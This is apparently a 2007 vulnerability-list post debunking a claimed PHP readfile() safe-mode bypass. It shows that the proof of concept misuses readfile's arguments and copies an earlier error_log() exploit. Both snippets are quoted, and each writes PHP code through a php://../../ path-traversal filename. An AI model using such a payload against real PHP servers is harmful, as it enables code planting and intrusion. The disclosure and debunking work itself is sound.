[VIM] Fake - readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4
GM darkfig
gmdarkfig at gmail.com
Sat Mar 31 13:32:23 UTC 2007
The readfile() vulnerability doesn't exists. For example, the poc:
<?php $file=""; readfile("<? echo \"cx\"; ?>", 3,"php://../../".$file); ?>
Quote from php.net:
int readfile ( string $filename [, bool $use_include_path [, resource
$context]] )
The first argument isn't a filename, the second is not a bool (true/false).
The code quoted by the author is the code of the error_log function,
not the readfile function. In his poc he just changed the function.
Quote from SecurityReason:
- --- 2. Exploit ---
<?php
$file=""; # FILENAME
error_log("<? echo \"cx\"; ?>", 3,
"php://../../".$file);
?>
Quote from the fake:
- --- 2. Exploit ---
<?php
$file=""; # FILENAME
readfile("<? echo \"cx\"; ?>", 3,
"php://../../".$file);
?>
This will not work.
More information about the VIM
mailing list